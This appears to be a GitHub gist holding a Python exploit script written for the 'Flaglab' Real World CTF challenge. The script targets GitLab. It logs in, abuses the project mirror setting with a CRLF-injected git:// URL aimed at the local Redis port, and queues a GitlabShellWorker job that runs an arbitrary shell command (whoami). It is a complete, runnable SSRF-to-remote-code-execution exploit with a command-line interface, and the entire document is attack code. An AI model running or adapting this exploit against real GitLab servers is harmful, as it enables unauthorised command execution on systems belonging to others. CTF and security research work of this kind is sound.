/exploit.py
Created Jan 4, 2019
Flaglab Real World CTF
| #!/usr/bin/env python3 | |
| import requests | |
| import sys | |
| from bs4 import BeautifulSoup | |
| from urllib.parse import urljoin | |
| import random | |
| import logging | |
| import time | |
| s = requests.Session() | |
| def get_csrf_token(html): | |
| soup = BeautifulSoup(html) | |
| auth_token = soup.find("input", {"name": "authenticity_token"}) | |
| return auth_token["value"] | |
| def login(username, password): | |
| response = s.get(urljoin(target, '/users/sign_in')) | |
| token = get_csrf_token(response.text) | |
| data = { | |
| 'user[login]': username, | |
| 'user[password]': password, | |
| 'authenticity_token': token | |
| } | |
| response = s.post(urljoin(target, '/users/sign_in'), data=data) | |
| assert(response.status_code == 200) | |
| def execute_payload(username, project, payload): | |
| namespace = username | |
| response = s.get(urljoin(target, "/".join([namespace, project, 'settings/repository']))) | |
| token = get_csrf_token(response.text) | |
| url = 'git://[0:0:0:0:0:ffff:127.0.0.1]:6379/\r\n\n\n' + payload + '\n' | |
| data = { | |
| '_method': 'patch', | |
| 'project[remote_mirrors_attributes][0][enabled]': '1', | |
| 'project[remote_mirrors_attributes][0][only_protected_branches]': 'true', | |
| 'project[remote_mirrors_attributes][0][uri]': url, | |
| 'uri': url, | |
| 'authenticity_token': token, | |
| 'auth_metod': '', | |
| 'password': '' | |
| } | |
| response = s.post(urljoin(target, "/".join([namespace, project, 'mirror'])), data=data) | |
| data = { | |
| '_method': 'post', | |
| 'authenticity_token': token | |
| } | |
| response = s.post(urljoin(target, "/".join([namespace, project, 'mirror/update_now?sync_remote=true'])), data=data) | |
| if __name__ == '__main__': | |
| if len(sys.argv) != 5: | |
| print("python3 exploit.py target username password projectname") | |
| sys.exit(1) | |
| target = sys.argv[1] | |
| username = sys.argv[2] | |
| password = sys.argv[3] | |
| projectname = sys.argv[4] | |
| jid = ''.join(random.choice('0123456789abcdeg') for n in range(24)) | |
| payload = """ | |
| multi | |
| sadd resque:gitlab:queues system_hook_push | |
| lpush resque:gitlab:queue:system_hook_push "{\\"class\\":\\"GitlabShellWorker\\",\\"args\\":[\\"classeval\\",\\"open(\\'|whoami > /tmp/a \\').read\\"],\\"retry\\":3,\\"queue\\":\\"system_hook_push\\",\\"jid\\":\\"%s\\",\\"created_at\\":1513714403.8122594,\\"enqueued_at\\":1513714403.8129568}" | |
| exec | |
| exec | |
| """ % jid | |
| login(username, password) | |
| execute_payload(username, projectname, payload) |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment